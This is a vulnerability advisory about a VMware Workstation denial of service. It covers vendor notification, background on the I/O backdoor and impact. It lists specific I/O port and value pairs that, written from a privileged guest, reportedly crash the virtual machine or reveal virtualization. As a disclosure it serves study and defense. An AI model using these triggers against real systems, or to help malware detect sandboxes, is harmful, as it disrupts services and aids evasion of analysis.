VMware Workstation IO Port Request Virtualized Machine Denial Of Service by Piotr Bania http://www.piotrbania.com Original url: http://www.piotrbania.com/all/adv/vmware-io-adv.txt Severity: Low/Moderate - Denial Of Service Vendor response: VMware was notified on 2008-06-06. Arround 2009 VMware stated that due to low severity of this vulnerability the issue will not be fully resolved. I. DESCRIPTION Few years ago Ken Kato released a document in which he described the so called "VMware Backdoor I/O Port". In short by sending a special request to a specified I/O port from the emulated machine he was able to "communicate" with the host machine (using the similiar mechanism as VMware tools had). See http://chitchat.at.infoseek.co.jp/vmware/backdoor.html for more details. Lately i was researching a bit more on the topic of I/O port requests done from the virtualized machine. It appears that there exist a way to crash the virtual machine by sending a specified command to specified I/O port number. This attack can be used for detecting the virtual machine presence and it can be really really nasty since it leads to total crash of the virtual machine. Of course the good thing is that the attack itself requires some special privileges necessary for performing I/O requests. However many of the current malware operates in the enough privileged mode (ie. r0 rootkits) so the attack can still be performed. Here's the shorter sample of my I/O ports list and request values suitable for making the attack. Those request were also tested in original machines of mine and it appears that they havent caused any crash on them, however it should mostly rely on the implementation done by the manufacturer. The I/O port description was taken from the "XT, AT and PS/2 I/O port addresses" by the Wim Osterholt. However like the author says the description maybe not be fully accurate. Sample ports and values: --//- snip ----//------------------------------------------------------------------------ PORT: 0x20 VALUE: 0x64 *Desc: PIC 1 (Programmable Interrupt Controller 8259) PIC initialization command word ICW1 PORT: 0x64 VALUE: 0xdd *Desc: 8042 Keyboard command/status register KB controller input buffer (ISA, EISA) PORT: 0xb2 VALUE: 0x00 *Desc: ??? PORT: 0xb3 VALUE: 0x00 *Desc: ??? PORT: 0xd2 VALUE: 0x04 *Desc: DMA 2 (second Direct Memory Access controller 8237) DMA channel 4-7 write request register (ISA, EISA) PORT: 0x177 VALUE: 0x00 *Desc: HDC 2 (2nd Fixed Disk Controller) same as 01Fx (ISA, EISA) PORT: 0x1f7 VALUE: 0x00 *Desc: HDC 1 (1st Fixed Disk Controller) same as 017x (ISA, EISA) PORT: 0x376 VALUE: 0x00 *Desc: Floppy disk controller (except PCjr) Diskette controller data (2nd FIXED disk controller data register) PORT: 0x1005 VALUE: 0x00 *Desc: /1000-10FF/ ---- available for EISA slot 1 PORT: 0x102c VALUE: 0x02 *Desc: -//- PORT: 0x102d VALUE: 0x02 *Desc: -//- PORT: 0x102e VALUE: 0x02 *Desc: -//- PORT: 0x1042 VALUE: 0x01 *Desc: -//- etc. etc. --//- snip ----//------------------------------------------------------------------------ Notes: * - the description may not be accurate After successful attack the virtual machine should crash and similiar error message should be displayed: "VMware Workstation unrecoverable error: (vcpu-0) NOT_IMPLEMENTED /build/mts/release/bora-59824/bora/devices/misc/keyboard.c:2682" II. IMPACT Successful performed attack leads to the virtualized machine crash.